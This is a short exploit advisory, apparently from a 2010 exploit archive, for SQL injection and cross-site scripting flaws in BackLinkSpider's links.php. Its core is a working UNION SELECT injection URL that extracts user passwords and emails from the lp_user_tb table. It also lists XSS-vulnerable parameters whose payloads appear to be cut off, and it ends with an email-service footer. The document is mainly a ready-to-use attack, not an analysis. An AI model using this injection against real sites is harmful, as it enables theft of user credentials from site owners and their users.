# Exploit Title: [ BackLinkSpider - (links.php)  - [ SQL & XSS ] Injection Vulnerability ]
# Date: [ 2010-05-27 ]
# Author: [ sniper ip ]
# Software Link: [ http://www.backlinkspider.com ]
# Version: [ v 1.3.1774.0  ]
# Tested on: [ ]
# CVE : [if exists]


Exploit :

[ SQL ]

http://site.com/links.php?cat_id=-1+UNION+SELECT+1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20+from+lp_user_tb--

----------------------------------------------

[ XSS ]

http://site.com/links.php?cat_id=

http://site.com/links.php?siteid=

http://site.com/links.php?cat_id=1&cat_name=1 		 	   		  
_________________________________________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free.
https://signup.live.com/signup.aspx?id=60969